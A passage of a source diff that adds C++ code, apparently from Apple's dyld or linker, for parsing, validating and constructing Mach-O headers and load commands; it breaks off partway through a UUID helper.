+ const load_command* const cmdsEnd = (load_command*)((char*)startCmds + mh.sizeofcmds); + const load_command* cmd = startCmds; + for ( uint32_t i = 1; (i <= mh.ncmds) && !stop; ++i ) { + const load_command* nextCmd = (load_command*)((char*)cmd + cmd->cmdsize); + if ( cmd >= cmdsEnd ) { + return Error("malformed load command (%d of %d) at %p with mh=%p, off end of load commands", i, mh.ncmds, cmd, this); + } + if ( cmd->cmdsize < 8 ) { + return Error("malformed load command (%d of %d) at %p with mh=%p, size (0x%X) too small", i, mh.ncmds, cmd, this, cmd->cmdsize); + } +#if 0 + // check the cmdsize is pointer aligned + if ( checks.pointerAlignedLoadCommands ) { + if ( (cmd->cmdsize % ptrSize) != 0 ) { + return Error("malformed load command (%d of %d) at %p with mh=%p, size (0x%X) is not pointer sized", i, mh.ncmds, cmd, this, cmd->cmdsize); + } + } +#endif + if ( (nextCmd > cmdsEnd) || (nextCmd < startCmds) ) { + return Error("malformed load command (%d of %d) at %p with mh=%p, size (0x%X) is too large, load commands end at %p", i, mh.ncmds, cmd, this, cmd->cmdsize, cmdsEnd); + } + callback(cmd, stop); + cmd = nextCmd; + } + return Error::none(); +} + +// This forEach is only used after the load commands have been validated, so no need to return Error and handle it +void Header::forEachLoadCommandSafe(void (^callback)(const load_command* cmd, bool& stop)) const +{ + if ( Error err = forEachLoadCommand(callback) ) + assert("Header::forEachLoadCommand()"); +} + +bool Header::hasLoadCommand(uint32_t cmdNum) const +{ + __block bool hasLC = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == cmdNum ) { + hasLC = true; + stop = true; + } + }); + return hasLC; +} + +bool Header::isStaticExecutable() const +{ + if ( mh.filetype != MH_EXECUTE ) + return false; + + // static executables do not have dyld load command + return !hasLoadCommand(LC_LOAD_DYLINKER); +} + +// +// MARK: --- methods that read Platform load commands --- +// + +void Header::forEachPlatformLoadCommand(void (^handler)(Platform platform, Version32 minOS, Version32 sdk)) const +{ + __block bool foundPlatform = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + const build_version_command* buildCmd = (build_version_command*)cmd; + const version_min_command* versCmd = (version_min_command*)cmd; + uint32_t sdk; + switch ( cmd->cmd ) { + case LC_BUILD_VERSION: + handler(Platform(buildCmd->platform), Version32(buildCmd->minos), Version32(buildCmd->sdk)); + foundPlatform = true; + break; + case LC_VERSION_MIN_MACOSX: + sdk = versCmd->sdk; + // The original LC_VERSION_MIN_MACOSX did not have an sdk field, assume sdk is same as minOS for those old binaries + if ( sdk == 0 ) + sdk = versCmd->version; + handler(Platform::macOS, Version32(versCmd->version), Version32(sdk)); + foundPlatform = true; + break; + case LC_VERSION_MIN_IPHONEOS: + if ( (mh.cputype == CPU_TYPE_X86_64) || (mh.cputype == CPU_TYPE_I386) ) + handler(Platform::iOS_simulator, Version32(versCmd->version), Version32(versCmd->sdk)); // old sim binary + else + handler(Platform::iOS, Version32(versCmd->version), Version32(versCmd->sdk)); + foundPlatform = true; + break; + case LC_VERSION_MIN_TVOS: + if ( mh.cputype == CPU_TYPE_X86_64 ) + handler(Platform::tvOS_simulator, Version32(versCmd->version), Version32(versCmd->sdk)); // old sim binary + else + handler(Platform::tvOS, Version32(versCmd->version), Version32(versCmd->sdk)); + foundPlatform = true; + break; + case LC_VERSION_MIN_WATCHOS: + if ( (mh.cputype == CPU_TYPE_X86_64) || (mh.cputype == CPU_TYPE_I386) ) + handler(Platform::watchOS_simulator, Version32(versCmd->version), Version32(versCmd->sdk)); // old sim binary + else + handler(Platform::watchOS, Version32(versCmd->version), Version32(versCmd->sdk)); + foundPlatform = true; + break; + } + }); +#ifndef BUILDING_MACHO_WRITER // no implicit platforms in static linker + if ( !foundPlatform ) { + // old binary with no explicit platform +#if TARGET_OS_OSX + if ( (mh.cputype == CPU_TYPE_X86_64) | (mh.cputype == CPU_TYPE_I386) ) + handler(Platform::macOS, Version32(10, 5), Version32(10, 5)); // guess it is a macOS 10.5 binary + // + // The Go linker emits non-standard binaries without a platform and we have to live with it. + if ( mh.cputype == CPU_TYPE_ARM64 ) + handler(Platform::macOS, Version32(11, 0), Version32(11, 0)); // guess it is a macOS 11.0 binary +#endif + } +#endif +} + +bool Header::builtForPlatform(Platform reqPlatform, bool onlyOnePlatform) const +{ + PlatformAndVersions pvs = platformAndVersions(); + + if ( pvs.platform == reqPlatform ) + return true; + + if ( onlyOnePlatform ) + return false; + + __block bool match = false; + pvs.unzip(^(PlatformAndVersions pvers) { + match |= pvers.platform == reqPlatform; + }); + + return match; +} + +bool Header::isZippered() const +{ + return platformAndVersions().platform == Platform::zippered; +} + +bool Header::allowsAlternatePlatform() const +{ + __block bool result = false; + this->forEachSection(^(const SectionInfo& info, bool& stop) { + if ( (info.sectionName == "__allow_alt_plat") && info.segmentName.starts_with("__DATA") ) { + result = true; + stop = true; + } + }); + return result; +} + +const char* Header::installName() const +{ + const char* name; + Version32 compatVersion; + Version32 currentVersion; + if ( getDylibInstallName(&name, &compatVersion, ¤tVersion) ) + return name; + return nullptr; +} + +bool Header::getDylibInstallName(const char** installName, Version32* compatVersion, Version32* currentVersion) const +{ + __block bool found = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_ID_DYLIB ) { + const dylib_command* dylibCmd = (dylib_command*)cmd; + *compatVersion = Version32(dylibCmd->dylib.compatibility_version); + *currentVersion = Version32(dylibCmd->dylib.current_version); + *installName = (char*)dylibCmd + dylibCmd->dylib.name.offset; + found = true; + stop = true; + } + }); + return found; +} + +bool Header::getUuid(uuid_t uuid) const +{ + __block bool found = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_UUID ) { + const uuid_command* uc = (const uuid_command*)cmd; + memcpy(uuid, uc->uuid, sizeof(uuid_t)); + found = true; + stop = true; + } + }); + if ( !found ) + bzero(uuid, sizeof(uuid_t)); + return found; +} + + +const char* Header::dependentDylibLoadPath(uint32_t depIndex) const +{ + __block uint32_t curIndex = 0; + __block const char* result = nullptr; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_LOAD_DYLIB: + case LC_LOAD_WEAK_DYLIB: + case LC_REEXPORT_DYLIB: + case LC_LOAD_UPWARD_DYLIB: { + const dylib_command* dylibCmd = (dylib_command*)cmd; + if ( curIndex == depIndex ) + result = (char*)dylibCmd + dylibCmd->dylib.name.offset; + ++curIndex; + } break; + } + }); + return result; +} + +uint32_t Header::dependentDylibCount(bool* allDepsAreNormal) const +{ + if ( allDepsAreNormal != nullptr ) + *allDepsAreNormal = true; + __block unsigned count = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_LOAD_WEAK_DYLIB: + case LC_REEXPORT_DYLIB: + case LC_LOAD_UPWARD_DYLIB: + if ( allDepsAreNormal != nullptr ) + *allDepsAreNormal = false; // record if any linkages were weak, re-export, or upward + ++count; + break; + case LC_LOAD_DYLIB: + ++count; + break; + } + }); + return count; +} + +void Header::forEachDependentDylib(void (^callback)(const char* loadPath, bool isWeak, bool isReExport, bool isUpward, + Version32 compatVersion, Version32 curVersion, bool& stop)) const +{ + __block unsigned count = 0; + __block bool stopped = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_LOAD_DYLIB: + case LC_LOAD_WEAK_DYLIB: + case LC_REEXPORT_DYLIB: + case LC_LOAD_UPWARD_DYLIB: { + const dylib_command* dylibCmd = (dylib_command*)cmd; + const char* loadPath = (char*)dylibCmd + dylibCmd->dylib.name.offset; + callback(loadPath, (cmd->cmd == LC_LOAD_WEAK_DYLIB), (cmd->cmd == LC_REEXPORT_DYLIB), (cmd->cmd == LC_LOAD_UPWARD_DYLIB), + Version32(dylibCmd->dylib.compatibility_version), Version32(dylibCmd->dylib.current_version), stop); + ++count; + if ( stop ) + stopped = true; + } break; + } + }); + // everything must link with something + if ( (count == 0) && !stopped ) { + // The dylibs that make up libSystem can link with nothing + // except for dylibs in libSystem.dylib which are ok to link with nothing (they are on bottom) + if ( this->builtForPlatform(Platform::driverKit, true) ) { + if ( !this->isDylib() || (strncmp(this->installName(), "/System/DriverKit/usr/lib/system/", 33) != 0) ) + callback("/System/DriverKit/usr/lib/libSystem.B.dylib", false, false, false, Version32(1, 0), Version32(1, 0), stopped); + } + else { + if ( !this->isDylib() || (strncmp(this->installName(), "/usr/lib/system/", 16) != 0) ) + callback("/usr/lib/libSystem.B.dylib", false, false, false, Version32(1, 0), Version32(1, 0), stopped); + } + } +} + +void Header::forDyldEnv(void (^callback)(const char* envVar, bool& stop)) const +{ + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_DYLD_ENVIRONMENT ) { + const dylinker_command* envCmd = (dylinker_command*)cmd; + const char* keyEqualsValue = (char*)envCmd + envCmd->name.offset; + // only process variables that start with DYLD_ and end in _PATH + if ( (strncmp(keyEqualsValue, "DYLD_", 5) == 0) ) { + const char* equals = strchr(keyEqualsValue, '='); + if ( equals != NULL ) { + if ( strncmp(&equals[-5], "_PATH", 5) == 0 ) { + callback(keyEqualsValue, stop); + } + } + } + } + }); +} + +bool Header::entryAddrFromThreadCmd(const thread_command* cmd, uint64_t& addr) const +{ + const uint32_t* regs32 = (uint32_t*)(((char*)cmd) + 16); + const uint64_t* regs64 = (uint64_t*)(((char*)cmd) + 16); + uint32_t flavor = *((uint32_t*)(((char*)cmd) + 8)); + switch ( mh.cputype ) { + case CPU_TYPE_I386: + if ( flavor == 1 ) { // i386_THREAD_STATE + addr = regs32[10]; // i386_thread_state_t.eip + return true; + } + break; + case CPU_TYPE_X86_64: + if ( flavor == 4 ) { // x86_THREAD_STATE64 + addr = regs64[16]; // x86_thread_state64_t.rip + return true; + } + break; + case CPU_TYPE_ARM: + if ( flavor == 1 ) { // ARM_THREAD_STATE + addr = regs32[15]; // arm_thread_state_t.pc + return true; + } + break; + case CPU_TYPE_ARM64: + if ( flavor == 6 ) { // ARM_THREAD_STATE64 + addr = regs64[32]; // arm_thread_state64_t.__pc + return true; + } + break; + } + return false; +} + +// returns false if entry point not found +bool Header::getEntry(uint64_t& offset, bool& usesCRT) const +{ + __block bool result = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_MAIN ) { + entry_point_command* mainCmd = (entry_point_command*)cmd; + offset = mainCmd->entryoff; + usesCRT = false; + result = true; + stop = true; + } + else if ( cmd->cmd == LC_UNIXTHREAD ) { + uint64_t startAddress; + if ( entryAddrFromThreadCmd((thread_command*)cmd, startAddress) ) { + offset = startAddress - preferredLoadAddress(); + usesCRT = true; + result = true; + } + stop = true; + } + }); + return result; +} + +bool Header::hasCodeSignature(uint32_t& fileOffset, uint32_t& size) const +{ + __block bool result = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_CODE_SIGNATURE ) { + linkedit_data_command* sigCmd = (linkedit_data_command*)cmd; + fileOffset = sigCmd->dataoff; + size = sigCmd->datasize; + result = true; + stop = true; + } + }); + // FIXME: may need to ignore codesigs from pre 10.9 macOS binaries + return result; +} + +bool Header::hasIndirectSymbolTable(uint32_t& fileOffset, uint32_t& count) const +{ + __block bool result = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_DYSYMTAB) { + dysymtab_command* dySymCmd = (dysymtab_command*)cmd; + fileOffset = dySymCmd->indirectsymoff; + count = dySymCmd->nindirectsyms; + result = true; + stop = true; + } + }); + return result; +} + +bool Header::hasSplitSegInfo() const +{ + __block bool result = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_SPLIT_INFO) { + result = true; + stop = true; + } + }); + return result; +} + +bool Header::hasAtomInfo(uint32_t& fileOffset, uint32_t& size) const +{ + __block bool result = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_ATOM_INFO) { + linkedit_data_command* sigCmd = (linkedit_data_command*)cmd; + fileOffset = sigCmd->dataoff; + size = sigCmd->datasize; + result = true; + stop = true; + } + }); + return result; +} + + +uint32_t Header::segmentCount() const +{ + __block uint32_t count = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + switch ( cmd->cmd ) { + case LC_SEGMENT: + case LC_SEGMENT_64: + ++count; + break; + } + }); + return count; +} + +uint64_t Header::preferredLoadAddress() const +{ + __block uint64_t textVmAddr = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* segCmd = (segment_command_64*)cmd; + if ( strcmp(segCmd->segname, "__TEXT") == 0 ) { + textVmAddr = segCmd->vmaddr; + stop = true; + } + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* segCmd = (segment_command*)cmd; + if ( strcmp(segCmd->segname, "__TEXT") == 0 ) { + textVmAddr = segCmd->vmaddr; + stop = true; + } + } + }); + return textVmAddr; +} + +int64_t Header::getSlide() const +{ + return (long)this - (long)(this->preferredLoadAddress()); +} + +bool Header::hasDataConst() const +{ + __block bool result = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* segCmd = (segment_command_64*)cmd; + if ( (segCmd->flags & SG_READ_ONLY) != 0 ) + result = true; + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* segCmd = (segment_command*)cmd; + if ( (segCmd->flags & SG_READ_ONLY) != 0 ) + result = true; + } + }); + return result; +} + +std::string_view Header::segmentName(uint32_t segIndex) const +{ + __block std::string_view result; + __block uint32_t segCount = 0; + this->forEachSegment(^(const SegmentInfo& info, bool& stop) { + if ( segIndex == segCount ) { + result = info.segmentName; + stop = true; + } + ++segCount; + }); + return result; +} + +// LC_SEGMENT stores names as char[16] potentially without a null terminator. This returns a string_view for the given name +static std::string_view name16(const char name[16]) +{ + size_t length = strnlen(name, 16); + return std::string_view(name, length); +} + +void Header::forEachSegment(void (^callback)(const SegmentInfo& infos, bool& stop)) const +{ + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* segCmd = (segment_command_64*)cmd; + SegmentInfo segInfo { .segmentName=name16(segCmd->segname), .vmaddr=segCmd->vmaddr, .vmsize=segCmd->vmsize, + .fileOffset=(uint32_t)segCmd->fileoff, .fileSize=(uint32_t)segCmd->filesize, .flags=segCmd->flags, .perms=(uint8_t)segCmd->initprot }; + callback(segInfo, stop); + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* segCmd = (segment_command*)cmd; + SegmentInfo segInfo { .segmentName=name16(segCmd->segname), .vmaddr=segCmd->vmaddr, .vmsize=segCmd->vmsize, + .fileOffset=segCmd->fileoff, .fileSize=segCmd->filesize, .flags=segCmd->flags, .perms=(uint8_t)segCmd->initprot }; + callback(segInfo, stop); + } + }); +} + +void Header::forEachSection(void (^callback)(const SectionInfo&, bool& stop)) const +{ + __block uint64_t prefLoadAddr = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* segCmd = (segment_command_64*)cmd; + if ( strcmp(segCmd->segname, "__TEXT") == 0 ) + prefLoadAddr = segCmd->vmaddr; + const section_64* const sectionsStart = (section_64*)((char*)segCmd + sizeof(struct segment_command_64)); + const section_64* const sectionsEnd = §ionsStart[segCmd->nsects]; + + for ( const section_64* sect = sectionsStart; !stop && (sect < sectionsEnd); ++sect ) { + std::string_view sectName = name16(sect->sectname); + std::string_view segName = name16(sect->segname); + SectionInfo info = { segName, sectName, (uint32_t)segCmd->initprot, sect->flags, sect->align, sect->addr - prefLoadAddr, sect->size, sect->offset, + sect->reloff, sect->nreloc, sect->reserved1, sect->reserved2}; + callback(info, stop); + } + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* segCmd = (segment_command*)cmd; + if ( strcmp(segCmd->segname, "__TEXT") == 0 ) + prefLoadAddr = segCmd->vmaddr; + const section* const sectionsStart = (section*)((char*)segCmd + sizeof(struct segment_command)); + const section* const sectionsEnd = §ionsStart[segCmd->nsects]; + for ( const section* sect = sectionsStart; !stop && (sect < sectionsEnd); ++sect ) { + std::string_view sectName = name16(sect->sectname); + std::string_view segName = name16(sect->segname); + SectionInfo info = { segName, sectName, (uint32_t)segCmd->initprot, sect->flags, sect->align, sect->addr - prefLoadAddr, sect->size, sect->offset, + sect->reloff, sect->nreloc, sect->reserved1, sect->reserved2}; + callback(info, stop); + } + } + }); +} + +// add any LINKEDIT content file-offset in load commands to this to get content +const uint8_t* Header::computeLinkEditBias(bool zeroFillExpanded) const +{ + // When there is no zerofill expansion, just add fileoffset of LINKEDIT content to mach_header to get content + // If there is zerofill expansion, then zerofillExpansionAmount() needs to be added in too + if ( zeroFillExpanded ) + return (uint8_t*)this + zerofillExpansionAmount(); + else + return (uint8_t*)this; +} + +// When loaded by dyld, LINKEDIT is farther from mach_header than in file +bool Header::hasZerofillExpansion() const +{ + return (zerofillExpansionAmount() != 0); +} + +uint64_t Header::zerofillExpansionAmount() const +{ + // need to find LINKEDIT and TEXT to compute difference of file offsets vs vm offsets + __block uint64_t result = 0; + __block uint64_t textVmAddr = 0; + __block uint64_t textFileOffset = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SEGMENT_64 ) { + const segment_command_64* segCmd = (segment_command_64*)cmd; + if ( strcmp(segCmd->segname, "__TEXT") == 0 ) { + textVmAddr = segCmd->vmaddr; + textFileOffset = segCmd->fileoff; + } + else if ( strcmp(segCmd->segname, "__LINKEDIT") == 0 ) { + uint64_t vmOffsetToLinkedit = segCmd->vmaddr - textVmAddr; + uint64_t fileOffsetToLinkedit = segCmd->fileoff; + result = vmOffsetToLinkedit - fileOffsetToLinkedit; + stop = true; + } + } + else if ( cmd->cmd == LC_SEGMENT ) { + const segment_command* segCmd = (segment_command*)cmd; + if ( strcmp(segCmd->segname, "__TEXT") == 0 ) { + textVmAddr = segCmd->vmaddr; + textFileOffset = segCmd->fileoff; + } + else if ( strcmp(segCmd->segname, "__LINKEDIT") == 0 ) { + uint64_t vmOffsetToLinkedit = segCmd->vmaddr - textVmAddr; + uint64_t fileOffsetToLinkedit = segCmd->fileoff - textFileOffset; + result = vmOffsetToLinkedit - fileOffsetToLinkedit; + stop = true; + } + } + }); + return result; +} + +bool Header::hasCustomStackSize(uint64_t& size) const { + __block bool result = false; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_MAIN ) { + const entry_point_command* entryPointCmd = (entry_point_command*)cmd; + size = entryPointCmd->stacksize; + result = true; + stop = true; + } + }); + return result; +} + +bool Header::isRestricted() const +{ + __block bool result = false; + this->forEachSection(^(const SectionInfo& info, bool& stop) { + if ( (info.segmentName == "__RESTRICT") && (info.sectionName == "__restrict") ) { + result = true; + stop = true; + } + }); + return result; +} + +bool Header::hasInterposingTuples() const +{ + __block bool hasInterposing = false; + this->forEachSection(^(const SectionInfo& info, bool& stop) { + if ( ((info.flags & SECTION_TYPE) == S_INTERPOSING) || ((info.sectionName == "__interpose") && (info.segmentName.starts_with("__DATA") || info.segmentName.starts_with("__AUTH"))) ) { + hasInterposing = true; + stop = true; + } + }); + return hasInterposing; +} + +bool Header::hasObjC() const +{ + __block bool hasObjCInfo = false; + this->forEachSection(^(const SectionInfo& info, bool& stop) { + if ( (info.sectionName == "__objc_imageinfo") && info.segmentName.starts_with("__DATA") ) { + hasObjCInfo = true; + stop = true; + } + }); + return hasObjCInfo; +} + +bool Header::hasEncryptionInfo(uint32_t& cryptId, uint32_t& textOffset, uint32_t& size) const +{ + if ( const encryption_info_command* encCmd = findFairPlayEncryptionLoadCommand() ) { + cryptId = encCmd->cryptid; + textOffset = encCmd->cryptoff; + size = encCmd->cryptsize; + return true; + } + textOffset = 0; + size = 0; + return false; +} + +bool Header::isFairPlayEncrypted(uint32_t& textOffset, uint32_t& size) const +{ + // Note: cryptid is 0 in just-built apps. The AppStore sets cryptid to 1 + uint32_t cryptId = 0; + return hasEncryptionInfo(cryptId, textOffset, size) && cryptId == 1; +} + +bool Header::canBeFairPlayEncrypted() const +{ + return (findFairPlayEncryptionLoadCommand() != nullptr); +} + +const encryption_info_command* Header::findFairPlayEncryptionLoadCommand() const +{ + __block const encryption_info_command* result = nullptr; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( (cmd->cmd == LC_ENCRYPTION_INFO) || (cmd->cmd == LC_ENCRYPTION_INFO_64) ) { + result = (encryption_info_command*)cmd; + stop = true; + } + }); + return result; +} + +bool Header::hasChainedFixups() const +{ + // arm64e always uses chained fixups + if ( Architecture(&mh) == Architecture::arm64e ) { + // Not all binaries have fixups at all so check for the load commands + return hasLoadCommand(LC_DYLD_INFO_ONLY) || hasLoadCommand(LC_DYLD_CHAINED_FIXUPS); + } + return hasLoadCommand(LC_DYLD_CHAINED_FIXUPS); +} + +bool Header::hasChainedFixupsLoadCommand() const +{ + return hasLoadCommand(LC_DYLD_CHAINED_FIXUPS); +} + +bool Header::hasOpcodeFixups() const +{ + return hasLoadCommand(LC_DYLD_INFO_ONLY) || hasLoadCommand(LC_DYLD_INFO); +} + +void Header::forEachRPath(void (^callback)(const char* rPath, bool& stop)) const +{ + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_RPATH ) { + const char* rpath = (char*)cmd + ((struct rpath_command*)cmd)->path.offset; + callback(rpath, stop); + } + }); +} + +void Header::forEachLinkerOption(void (^callback)(const char* opt, bool& stop)) const +{ + forEachLoadCommandSafe(^(const load_command *cmd, bool &stop) { + if ( cmd->cmd == LC_LINKER_OPTION ) { + const char* begin = (char*)cmd + sizeof(linker_option_command); + const uint32_t count = ((linker_option_command*)cmd)->count; + for ( uint32_t i = 0; i < count; ++i ) { + const char* next = begin + strlen(begin) + 1; + callback(begin, stop); + begin = next; + } + } + }); +} + +void Header::forAllowableClient(void (^callback)(const char* clientName, bool& stop)) const +{ + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SUB_CLIENT ) { + const char* clientName = (char*)cmd + ((struct sub_client_command*)cmd)->client.offset; + callback(clientName, stop); + } + }); +} + +const char* Header::umbrellaName() const +{ + __block const char* result = nullptr; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SUB_FRAMEWORK ) { + result = (char*)cmd + ((struct sub_framework_command*)cmd)->umbrella.offset; + } + }); + return result; +} + + +uint32_t Header::headerAndLoadCommandsSize() const +{ + return machHeaderSize() + mh.sizeofcmds; +} + +uint32_t Header::fileSize() const +{ + if ( isObjectFile() ) { + // .o files do not have LINKEDIT segment, so use end of symbol table as file size + __block uint32_t size = 0; + forEachLoadCommandSafe(^(const load_command* cmd, bool& stop) { + if ( cmd->cmd == LC_SYMTAB ) { + const symtab_command* symTab = (symtab_command*)cmd; + size = symTab->stroff + symTab->strsize; + stop = true; + } + }); + return size; + } + + // compute file size from LINKEDIT fileoffset + filesize + __block uint32_t lastSegmentOffset = 0; + __block uint32_t lastSegmentSize = 0; + forEachSegment(^(const SegmentInfo &infos, bool &stop) { + if ( infos.fileOffset >= lastSegmentOffset ) { + lastSegmentOffset = infos.fileOffset; + lastSegmentSize = std::max(infos.fileSize, lastSegmentSize); + } + }); + if ( lastSegmentSize == 0 ) + return headerAndLoadCommandsSize(); + + uint32_t size; + if ( __builtin_add_overflow(lastSegmentOffset, lastSegmentSize, &size) + || size < headerAndLoadCommandsSize() ) + assert("malformed mach-o, size smaller than header and load commands"); + + return size; +} + +// +// MARK: --- methods that create and modify --- +// + +#if BUILDING_MACHO_WRITER + +Header* Header::make(std::span buffer, uint32_t filetype, uint32_t flags, Architecture arch, bool addImplicitTextSegment) +{ + const size_t minHeaderAlignment = filetype == MH_OBJECT ? 8 : getpagesize(); + assert(((uint64_t)buffer.data() & (minHeaderAlignment - 1)) == 0); + assert(buffer.size() >= sizeof(mach_header_64)); + bzero(buffer.data(), buffer.size()); + Header& header = *(Header*)buffer.data(); + mach_header& mh = header.mh; + if ( arch.isBigEndian() ) { + mh.magic = arch.is64() ? MH_CIGAM_64 : MH_CIGAM; + mh.filetype = OSSwapBigToHostInt32(filetype); + mh.ncmds = 0; + mh.sizeofcmds = OSSwapBigToHostInt32(MH_NOUNDEFS | MH_DYLDLINK | MH_TWOLEVEL); + mh.flags = OSSwapBigToHostInt32(flags); + arch.set(mh); + return &header; // can only construct mach_header for big-endian + } + else { + mh.magic = arch.is64() ? MH_MAGIC_64 : MH_MAGIC; + mh.filetype = filetype; + mh.ncmds = 0; + mh.sizeofcmds = 0; + mh.flags = flags; + arch.set(mh); + } + if ( addImplicitTextSegment && (filetype != MH_OBJECT) ) { + SegmentInfo segInfo { .segmentName="__TEXT", .vmaddr=0, .vmsize=0x1000, .fileOffset=0, .fileSize=0x1000, .perms=(VM_PROT_READ | VM_PROT_EXECUTE) }; + header.addSegment(segInfo, std::array { "__text" }); + } + + return &header; +} + +void Header::save(char savedPath[PATH_MAX]) const +{ + ::strcpy(savedPath, "/tmp/mocko-XXXXXX"); + int fd = ::mkstemp(savedPath); + if ( fd != -1 ) { + ::pwrite(fd, this, sizeof(Header), 0); + ::close(fd); + } +} + +uint32_t Header::pointerAligned(uint32_t value) const +{ + // mach-o requires all load command sizes to be a multiple the pointer size + if ( is64() ) + return ((value + 7) & (-8)); + else + return ((value + 3) & (-4)); +} + +load_command* Header::firstLoadCommand() +{ + if ( mh.magic == MH_MAGIC ) + return (load_command*)((uint8_t*)this + sizeof(mach_header)); + else + return (load_command*)((uint8_t*)this + sizeof(mach_header_64)); +} + +// creates space for a new load command, but does not fill in its payload +load_command* Header::appendLoadCommand(uint32_t cmd, uint32_t cmdSize) +{ + load_command* thisCmd = (load_command*)((uint8_t*)firstLoadCommand() + mh.sizeofcmds); + thisCmd->cmd = cmd; + thisCmd->cmdsize = cmdSize; + mh.ncmds += 1; + mh.sizeofcmds += cmdSize; + + return thisCmd; +} + +// copies a new load command from another +void Header::appendLoadCommand(const load_command* lc) +{ + load_command* thisCmd = (load_command*)((uint8_t*)firstLoadCommand() + mh.sizeofcmds); + ::memcpy(thisCmd, lc, lc->cmdsize); + mh.ncmds += 1; + mh.sizeofcmds += lc->cmdsize; +} + +void Header::addBuildVersion(Platform platform, Version32 minOS, Version32 sdk, std::span tools) +{ + assert(platform != Platform::zippered && "can't add a build command for Platform::zippered, it must be split"); + uint32_t lcSize = (uint32_t)(sizeof(build_version_command) + tools.size() * sizeof(build_tool_version)); + build_version_command* bv = (build_version_command*)appendLoadCommand(LC_BUILD_VERSION, lcSize); + bv->platform = platform.value(); + bv->minos = minOS.value(); + bv->sdk = sdk.value(); + bv->ntools = (uint32_t)tools.size(); + if ( bv->ntools != 0 ) + memcpy((uint8_t*)bv + sizeof(build_version_command), &tools[0], tools.size() * sizeof(build_tool_version)); +} + +void Header::addMinVersion(Platform platform, Version32 minOS, Version32 sdk) +{ + version_min_command vc; + vc.cmdsize = sizeof(version_min_command); + vc.version = minOS.value(); + vc.sdk = sdk.value(); + if ( platform == Platform::macOS ) + vc.cmd = LC_VERSION_MIN_MACOSX; + else if ( platform == Platform::iOS ) + vc.cmd = LC_VERSION_MIN_IPHONEOS; + else if ( platform == Platform::watchOS ) + vc.cmd = LC_VERSION_MIN_WATCHOS; + else if ( platform == Platform::tvOS ) + vc.cmd = LC_VERSION_MIN_TVOS; + else + assert(0 && "unknown platform"); + appendLoadCommand((load_command*)&vc); +} + +void Header::setHasThreadLocalVariables() +{ + assert(mh.filetype != MH_OBJECT); + mh.flags |= MH_HAS_TLV_DESCRIPTORS; +} + +void Header::setHasWeakDefs() +{ + assert(mh.filetype != MH_OBJECT); + mh.flags |= MH_WEAK_DEFINES; +} + +void Header::setUsesWeakDefs() +{ + assert(mh.filetype != MH_OBJECT); + mh.flags |= MH_BINDS_TO_WEAK; +} + +void Header::setAppExtensionSafe() +{ + assert(mh.filetype == MH_DYLIB); + mh.flags |= MH_APP_EXTENSION_SAFE; +} + +void Header::setSimSupport() +{ + assert(mh.filetype == MH_DYLIB); + mh.flags |= MH_SIM_SUPPORT; +} + +void Header::setNoReExportedDylibs() +{ + assert(mh.filetype == MH_DYLIB); + mh.flags |= MH_NO_REEXPORTED_DYLIBS; +} + +void Header::addPlatformInfo(Platform platform, Version32 minOS, Version32 sdk, std::span tools) +{ + Architecture arch(&mh); + Policy policy(arch, { platform, minOS, sdk }, mh.filetype); + switch ( policy.useBuildVersionLoadCommand() ) { + case Policy::preferUse: + case Policy::mustUse: + // three macOS dylibs under libSystem need to be built with old load commands to support old simulator runtimes + if ( isSimSupport() && (platform == Platform::macOS) && ((arch == Architecture::x86_64) || (arch == Architecture::i386)) ) + addMinVersion(platform, minOS, sdk); + else + addBuildVersion(platform, minOS, sdk, tools); + break; + case Policy::preferDontUse: + case Policy::mustNotUse: + addMinVersion(platform, minOS, sdk); + break; + } +} + +void Header::addNullUUID() +{ + uuid_command uc; + uc.cmd = LC_UUID; + uc.cmdsize = sizeof(uuid_command); + bzero(uc.uuid, 16); + appendLoadCommand((load_command*)&uc); +} + +void Header::addUniqueUUID(uuid_t copyOfUUID) +{ + uuid_command uc; + uc.cmd = LC_UUID; + uc.cmdsize = sizeof(uuid_command); + uuid_generate_random(uc.uuid); + appendLoadCommand((load_command*)&uc); + if ( copyOfUUID ) + memcpy(copyOfUUID, uc.uuid, sizeof(uuid_t)); 